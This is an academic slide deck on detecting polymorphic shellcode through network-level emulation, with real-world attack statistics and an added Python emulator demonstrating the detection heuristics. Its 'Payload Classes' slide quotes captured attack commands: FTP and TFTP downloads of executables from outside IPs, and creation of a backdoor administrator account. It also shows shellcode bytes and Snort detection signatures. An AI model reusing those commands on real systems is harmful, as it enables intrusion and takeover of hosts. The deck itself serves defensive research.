Real-world Polymorphic Attack Detection
http://www.ics.forth.gr/dcs
Michalis Polychronakis, Evangelos Markatos
Distributed Computing Systems Lab, FORTH-ICS, Crete, Greece
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Outline
• Introduction to the problem: shellcode attacks – buffer overflows
• Polymorphic attacks (self-modifying shellcode)
• Network-level Emulation (NEMU)
• Findings from real-world deployment
• Conclusion
Malware and Botnets
• What infected hosts are used for: port scanning, click fraud, extortion, phishing, illegal content, DDoS, malicious websites, code injection, spam
How?
• social engineering (phishing, spam, scareware, …)
• viruses (disks, CD-ROMs, USB sticks, warez, …)
• network traffic interception (access credentials, keys, …)
• password guessing (brute force, root:12345678, …)
• physical access (reboot, keylogger, screwdriver, …)
• software vulnerability exploitation
Code Injection Attacks
Remote Code-injection Attacks
• Code-injection attacks persist
  – Among the most common methods for remote system compromise
  – e.g., Conficker (MS08-067)
• Mechanics
  1. Send malicious request to network service
  2. Divert the execution flow of the vulnerable process
     • Buffer overflow (stack/heap/integer overflow, format string abuse, …)
  3. Execute the injected code (shellcode)
     • Performs arbitrary operations under the privileges of the vulnerable process
(Shellcode bytes shown on the slide:)
\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00
What is a buffer overflow?

    void f(int x)
    {
        char buffer[10];
        scanf("%s", buffer);
        // other code
    }

Runtime stack (figure; lowest address at the top):
    buffer[10]
    Return address
    Function-call arguments
    … calling functions

What if the input data is longer than 10 bytes?
What is a buffer overflow? (smashed stack)
• Buffer overflow attack
  – Attacker puts code (e.g. the machine code for execve(/bin/sh)) in buffer[10]
  – And transfers control to it via the return address

Smashed stack (figure; lowest address at the top):
    buffer[10]: machine code for execve(/bin/sh)
    Overwritten return address
    Function-call arguments
    … calling functions
Attacks – Defenses Coevolution
    Attack                  Defense
    Plain shellcode         String signatures
    Simple obfuscation      Regexp signatures
    Naive polymorphism      Static analysis
    Self-modifying code     Emulation
Polymorphic Shellcode
(Figure: the program counter PC steps through the decryptor, \x6A\x0F\x59\xE8\xFF\xFF\xFF\xFF\xC1\x5E\x80…, which rewrites the encrypted payload that follows it into the decrypted payload.)
• Self-decrypting code
  – The actual shellcode is not revealed until runtime
• Shellcode “packing” has become essential
  – IDS evasion
  – Avoidance of restricted bytes in the attack vector
Shellcode as seen on the wire
(figure)
Actual decrypted payload
(figure)
Code Obfuscation
• Problem: obfuscated polymorphic shellcode can be highly evasive
  – Each attack instance looks different from the others: difficult to fingerprint
  – Self-modifying code can hide the real malicious code: difficult to analyze statically
(Figure: Real CFG versus Observed CFG; the statically observed control-flow graph ends in a "?" where the decrypted code would be.)
Network-level Emulation
• Motivation: self-modifying shellcode will not reveal its actual form until it is executed on the victim host
• Main idea: execute each network request as if it were executable code
  – Resilience to code obfuscation
• Identify the inherent execution behavior of polymorphic shellcode
  – Focus on the decryption process
  – Generic, independent of the exploit/vulnerability/OS
Nemu
(Figure: the same inspection applied to a benign and a malicious request.)

Benign request:  GET /index.php HTTP/1.1 Host: www.foo.com …
  Executed as code it is random code:
    inc edi
    inc ebp
    push esp
    and [edi],ch
    imul ebp,[esi+0x64],dword 0x702e7865
    push dword 0x54482070
    push esp
    push eax
    das
    xor [esi],ebp
    xor [eax],esp
    …
  Usually crashes after a few instructions.

Malicious request:  GET /index.php HTTP/1.1 Hos\x6A\x0F\x59\xE8\xFF\xFF\xFF\xFF\xC1\x5E\x80… …
  Polymorphic shellcode (6A0759E8FFFFFFFFFFC15E80460AE0 304C0E0BE2FA …):
    push byte +0x7f
    pop ecx
    call 0x7                  GetPC code (for finding its place in memory)
    inc ecx
    pop esi
    add [esi+0xa],0xe0
    xor [esi+ecx+0xb],cl
    loop 0xe
    …
  Lots of self memory references!
Real World Deployment - Europe
• ~1.2 million attacks to/from real hosts in
  – 3 National Research Networks (NRNs) in Europe
  – 1 Educational Network in Greece
• April 2007 – October 2008

    Network  Total #attacks  External #attacks  #srcIP  #dstIP  Internal #attacks  #srcIP  #dstIP
    NRN1     1240716         396899 (32.0%)     10014   769     843817 (68.0%)     143     331572
    NRN2     12390           2617 (21.1%)       1043    82      9773 (78.9%)       66      4070
    NRN3     1961            441 (22.5%)        113     49      1520 (77.5%)       8       1518
    EDU      20516           13579 (66.2%)      3275    410     6937 (33.8%)       351     2253
Overall Activity: External Attacks
(Figure: 413,536 attacks against 23 ports.)
Overall Activity: Internal Attacks
• Large attack volume due to infected hosts
  – Against hosts inside and outside the organization
(Figure: 862,083 attacks.)
Attacked Services
    Port   Service
    21     FTP
    25     SMTP
    42     WINS
    80     Web
    110    POP3
    135    Location service
    139    NETBIOS
    143    IMAP
    445    SMB
    453    CreativeServer
    1023   W32.Sasser's FTP server
    1025   MS RPC
    1029   DCOM (alternative)
    1082   WinHole trojan
    1433   MS SQL server
    2000   ShixxNOTE 6.net messenger
    2100   Oracle XDB FTP server
    2103   MS Message Queuing service
    2967   Symantec
    2968   Symantec
    3050   Borland InterBase DB server
    5000   MS UPnP/SSDP
    5554   W32.Sasser's FTP server
    6881   P2P file sharing client
    30708  unknown
    41523  CA BrightStor Agent (MS SQL)
Shellcode Diversity
• In most cases, the number of unique shellcodes as seen on the wire is comparable to the number of attacks
  – Polymorphism
  – Variable fields in the initial shellcode
Payload Classes
    Class        # Types
    ConnectExec  17
    BindExec     9
    HTTPExec     5
    BindShell    4
    AddUser      3
    FTPExec      2
    TFTPExec     1

Examples shown on the slide:
    cmd /c echo open 208.111.5.228 2755 > i& echo user 1 1 >> i& echo get 2k3.exe >> i& echo quit >> i& ftp -n -s:i& 2k3.exe& del i
    cmd.exe /c net user Backupadmin corrie38 /ADD&& net localgroup Administrators Backupadmin /ADD
    tftp.exe -i 82.82.252.96 get runsvc32.exe
Doubly-encrypted Shellcode
(Figure.) First layer: alpha_mixed variation. Second layer: countdown variation.
References
• Zacharias Tzermias, Giorgos Sykiotakis, Michalis Polychronakis, and Evangelos P. Markatos. Combining Static and Dynamic Analysis for the Detection of Malicious Documents. In Proceedings of the 4th European Workshop on System Security (EuroSec). April 2011, Salzburg, Austria.
• Michalis Polychronakis, Kostas G. Anagnostakis, and Evangelos P. Markatos. An Empirical Study of Real-world Polymorphic Code Injection Attacks. In Proceedings of the 2nd USENIX Workshop on Large-Scale Exploits and Emergent Threats (LEET). 2009.
• Michalis Polychronakis, Kostas G. Anagnostakis, and Evangelos P. Markatos. Real-World Polymorphic Attack Detection using Network-Level Emulation. In Proceedings of the Cyber Security and Information Intelligence Research Workshop (CSIIRW). May 2008, Oak Ridge, TN.
• Michalis Polychronakis, Kostas G. Anagnostakis, and Evangelos P. Markatos. Emulation-based Detection of Non-self-contained Polymorphic Shellcode. In Proceedings of the 10th International Symposium on Recent Advances in Intrusion Detection (RAID). September 2007.
• Michalis Polychronakis, Kostas G. Anagnostakis, and Evangelos P. Markatos. Network-level Polymorphic Shellcode Detection using Emulation. In Proceedings of the GI/IEEE SIG SIDAR Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA). July 2006.
Summary
• Pattern matching/static analysis not enough
  – Highly polymorphic and self-modifying code
• Network-level emulation
  – Detects self-modifying polymorphic shellcode
• Remote code-injection attacks are still a major threat
  – Increasing sophistication
• Attackers have also turned their attention to less widely used services and third-party applications
SysSec: A European Network of Excellence in Managing Threats and Vulnerabilities in the Future Internet
Evangelos Markatos, FORTH-ICS
markatos AT ics.forth.gr - ASPLOS Mini Symposium 2011
Roadmap of the talk
• Security Challenges: What is the problem?
  – Hackers are getting more sophisticated
  – The impact of cyberattacks is getting larger
• What will we do?
  – SysSec: 4-year NoE to consolidate research in managing threats for the Future Internet
What is the impact of attacks?
“… potential (cyber)attacks against network infrastructures may have widespread and devastating consequences on our daily life: no more electricity or water at home, rail and plane accidents, hospitals out of service”
Viviane Reding, Vice President, European Commission
Government: The Parliament under attack
(figure)
Transportation: No train signals
(figure)
Defense: fighter planes grounded
(figure)
What about our lives? Are they next?
What's next?
• SysSec: managing threats and vulnerabilities for the future Internet, a Network of Excellence (2010-2014)
• Why?
  – We need to work towards solutions
  – We need to collaborate
    » At a European level
    » With our international colleagues around the world
• Partners: Poli. di Milano (IT), Vrije Universiteit (NL), BAS (Bulgaria), TU Vienna (Austria), TUBITAK (Turkey), FORTH-ICS (Greece), Institute Eurecom (FR), Chalmers U (Sweden)
What is SysSec?
• SysSec proposes a game-changing approach to cybersecurity:
  – Currently researchers are mostly reactive: they usually track cyberattackers after an attack has been launched; thus, researchers are always one step behind attackers
  – SysSec aims to break this vicious cycle
  – Researchers should become more proactive: anticipate attacks and vulnerabilities, predict and prepare for future threats, work on defenses before attacks materialize.
SysSec Aim and Objectives (I)
• Create an active, vibrant, and collaborating community of researchers with the expertise, capacity, and determination to anticipate and mitigate the emerging threats and vulnerabilities on the Future Internet.
  – SysSec aims to create a sense of “community” among those researchers, to mobilize this community, to consolidate its efforts, to expand their collaboration internationally, and become the single point of reference for Systems Security research in Europe.
SysSec Aim and Objectives (II)
• Advance European Security Research well beyond the state of the art
  – Research efforts are fragmented
  – SysSec aims to provide a research agenda and align their research activities with the agenda
  – Make SysSec a leading player in the international arena.
SysSec Aim and Objectives (III)
• Create a virtual distributed Center of Excellence in the area of emerging threats and vulnerabilities.
  – By forming a critical mass of European researchers and by aligning their activities, have the gravitas needed to play a leading role internationally, empowered to undertake large-scale, ambitious and high-impact research efforts.
• Create a Center of Academic Excellence in the area
  – Create an education and training program targeting young researchers and the industry.
  – Lay the foundations for a common graduate degree in the area with emphasis on Systems Security.
SysSec Aim and Objectives (IV)
• Maximize the impact of the project by proactive dissemination to the appropriate stakeholders.
  – Disseminate its results to international stakeholders so as to form the needed strategic partnerships (with similar projects and organizations overseas) to play a major role in the area.
  – Dissemination within the Member States will reinforce SysSec's role as a center of excellence and make SysSec a beacon for a new generation of European researchers.
• Create partnerships and transfer technology to the European Security Industry.
  – Create a close partnership with the security industry
  – Facilitate technology transfer wherever possible to further strengthen the European market.
SysSec: How can you collaborate
• Contribute to the research roadmap/agenda
  – Provide feedback on emerging threats
  – Share your ideas on future security issues
• Contribute to our “systems security” University curriculum
  – Contribute homeworks/exams
  – Contribute/use lab exercises
  – Teach some of the courses at your University
  – Share some of your course material
• Become an “Associated Partner” of the project
Summary
• DCS
  – Conducts R&D in large-scale infrastructures
  – Designed and implemented LOBSTER: the largest academic European Internet monitoring infrastructure
  – Headed the design and implementation of the NoAH Honeypot infrastructure
  – Heads SysSec: the largest European Network of Excellence in systems security
Fallback slides
Attack Trace Repository
• http://lobster.ics.forth.gr/traces/
  – Public access
• Full payload traces of some of the captured attacks
• Tricky anonymization
  – Application-level protocols need to be carefully anonymized
  – Sensitive information in the encrypted payload!
Ongoing/Future Work
• New detection heuristics
  – Plain/metamorphic shellcode (no self-modifications)
  – Host-dependent shellcode
  – Client-side attacks
  – Other languages (e.g., Javascript)
• Improved CPU emulator
  – Faster
  – Complete instruction set
• Analyze captured attacks
  – and the related malware binaries
Detection Heuristic
1. GetPC code
   – The decryptor must find the absolute address of the encrypted payload for accessing it (not known in advance)
   – call, fstenv/fnstenv, fsave/fnsave
2. Self-references
   – The decryptor reads from several distinct memory locations in its own body
(Figure: execution traces of polymorphic shellcode, benign input and random code, with the GetPC code and the random reads/self-references marked.)
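The two heuristics above, and the Nemu request diagram earlier in the deck, worked through by a constructed emulator. This is an added example, not NEMU's code or the authors' implementation: it emulates only the handful of x86 instructions a countdown-style decoder needs, runs the request from every byte offset as NEMU does, and flags a buffer when an address pushed by `call` is popped into a register (GetPC code) and the code then reads at least `min_self_reads` distinct bytes of its own body (self-references). The decoder bytes, the plaintext, the load address `BASE`, the stack address `STACK_TOP` and the threshold are all assumptions of this example, not values from the slides.

```python
"""Added example (not from the slides): tiny x86-subset emulator for NEMU's two heuristics."""
from contextlib import suppress

BASE, STACK_TOP = 0x1000, 0x8000  # assumed load address of the request and initial ESP
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Constructed countdown-style decoder shaped like the slide's: push 7; pop ecx; call 0x7
# (GetPC; the call's last 0xFF doubles as the first byte of `inc ecx`); pop esi;
# xor [esi+ecx+0x7],cl; loop 0xa.  The 8-byte payload starts at offset 0x10.
DECODER = bytes.fromhex("6A07 59 E8FFFFFFFF C1 5E 304C0E07 E2FA")
PLAINTEXT = b"PAYLOAD!"                                           # stand-in for shellcode
ENCRYPTED = bytes(b ^ (i + 1) for i, b in enumerate(PLAINTEXT))  # byte i keyed by ecx=i+1
BENIGN_REQUEST = b"GET /index.php HTTP/1.1\r\nHost: www.foo.com\r\n\r\n"
ATTACK_REQUEST = b"GET /index.php HTTP/1.1\r\nHost: " + DECODER + ENCRYPTED

s8 = lambda b: b - 0x100 if b & 0x80 else b  # sign-extend an 8-bit displacement/immediate


class Emulator:
    """KeyError (unmapped memory) or NotImplementedError (opcode outside the subset) is the crash."""

    def __init__(self, data, start):
        self.base, self.end = BASE, BASE + len(data)
        self.mem = {BASE + i: b for i, b in enumerate(data)}  # byte-addressed memory
        self.reg = dict.fromkeys(REGS, 0)
        self.reg["esp"], self.eip = STACK_TOP, BASE + start
        self.retaddr_slots = set()  # stack slots written by `call`
        self.self_reads = set()     # distinct own-body addresses read as data
        self.getpc = False

    def read8(self, addr, fetch=False):
        val = self.mem[addr]  # KeyError here is the emulated crash
        if not fetch and self.base <= addr < self.end:
            self.self_reads.add(addr)  # heuristic 2: a data read from its own body
        return val

    def fetch(self, n=1):
        out = bytes(self.read8(self.eip + i, fetch=True) for i in range(n))
        self.eip += n
        return out

    def push(self, val, from_call=False):
        self.reg["esp"] = (self.reg["esp"] - 4) & 0xFFFFFFFF
        for i in range(4):
            self.mem[self.reg["esp"] + i] = (val >> (8 * i)) & 0xFF
        if from_call:
            self.retaddr_slots.add(self.reg["esp"])

    def pop(self):
        esp = self.reg["esp"]
        if esp in self.retaddr_slots:
            self.getpc = True  # heuristic 1: a call-pushed address lands in a register
        val = sum(self.read8(esp + i) << (8 * i) for i in range(4))
        self.reg["esp"] = (esp + 4) & 0xFFFFFFFF
        return val

    def step(self):
        op = self.fetch()[0]
        r = REGS[op & 7]
        if 0x40 <= op <= 0x4F:                          # inc/dec r32
            self.reg[r] = (self.reg[r] + (1 if op < 0x48 else -1)) & 0xFFFFFFFF
        elif 0x50 <= op <= 0x57:                        # push r32
            self.push(self.reg[r])
        elif 0x58 <= op <= 0x5F:                        # pop r32
            self.reg[r] = self.pop()
        elif op == 0x6A:                                # push imm8
            self.push(s8(self.fetch()[0]) & 0xFFFFFFFF)
        elif op == 0xE8:                                # call rel32 (the GetPC idiom)
            rel = int.from_bytes(self.fetch(4), "little", signed=True)
            self.push(self.eip, from_call=True)
            self.eip = (self.eip + rel) & 0xFFFFFFFF
        elif op == 0xFF:                                # FF /0 with mod=3: inc r32
            modrm = self.fetch()[0]
            if modrm & 0xF8 != 0xC0:
                raise NotImplementedError("FF form")
            self.reg[REGS[modrm & 7]] = (self.reg[REGS[modrm & 7]] + 1) & 0xFFFFFFFF
        elif op == 0x30:                                # xor [base+index+disp8], r8 (al..bl)
            modrm, sib, disp = self.fetch(3)
            if modrm & 0xE7 != 0x44 or sib & 0xC0:      # need mod=01, rm=SIB, scale=1
                raise NotImplementedError("xor form")
            addr = self.reg[REGS[sib & 7]] + self.reg[REGS[(sib >> 3) & 7]] + s8(disp)
            # in-place decryption: the write lands inside the buffer (self-modifying code)
            self.mem[addr] = self.read8(addr) ^ (self.reg[REGS[(modrm >> 3) & 7]] & 0xFF)
        elif op == 0xE2:                                # loop rel8
            rel, self.reg["ecx"] = s8(self.fetch()[0]), (self.reg["ecx"] - 1) & 0xFFFFFFFF
            if self.reg["ecx"]:
                self.eip = (self.eip + rel) & 0xFFFFFFFF
        else:
            raise NotImplementedError(f"opcode 0x{op:02x}")


def emulate(data, start, max_steps=4096):
    """Run `data` as code from byte offset `start`; a crash ends the run as on a real host."""
    emu = Emulator(data, start)
    with suppress(KeyError, NotImplementedError):
        for _ in range(max_steps):
            emu.step()
    return emu


def is_polymorphic(data, min_self_reads=8):  # the threshold is this example's assumption
    """NEMU-style verdict: some start offset shows GetPC code plus enough self-reads."""
    return any(e.getpc and len(e.self_reads) >= min_self_reads
               for e in (emulate(data, s) for s in range(len(data))))
```

`is_polymorphic(BENIGN_REQUEST)` is False: from every offset the ASCII request executes as a few harmless `inc`/`push` instructions and then faults, exactly the "usually crashes after a few instructions" trace on the Nemu slide. `is_polymorphic(ATTACK_REQUEST)` is True, and after `emulate(ATTACK_REQUEST, start)` the emulator's `mem` holds the decrypted payload, which never appeared on the wire; neither the signature nor the static disassembly of the request would have shown it. NEMU itself supports the full instruction set; the narrow subset here is what keeps the example short, not a property of the technique.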
Polymorphic Shellcode Engines
• Off-the-shelf polymorphic shellcode engines
• Original shellcode is 128 bytes, 1000 mutations with each engine
• In all cases the shellcode is decrypted correctly
(figure)
Passive Network Monitoring
• Examine the network traffic as it passes by…
  – Packet capture (tcpdump), NetFlow, …
• Non-intrusive: invisible on the network
  – vs. active monitoring (e.g., ping)
• Many applications
  – Performance measurements
  – Intrusion detection
  – Traffic characterization
  – Network trouble-shooting
  – Network planning
Example Snort Signatures
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"SHELLCODE Linux shellcode"; content:"|90 90 90 E8 C0 FF FF FF|/bin/sh"; classtype:shellcode-detect; sid:652; rev:9;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"SHELLCODE x86 setuid 0"; content:"|B0 17 CD 80|"; classtype:system-call-detect; sid:650; rev:8;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 10202:10203 (msg:"CA license GCR overflow attempt"; flow:to_server,established; content:"GCR NETWORK<"; depth:12; offset:3; nocase; pcre:"/^\S{65}|\S+\s+\S{65}|\S+\s+\S+\s+\S{65}/Ri"; sid:3520;)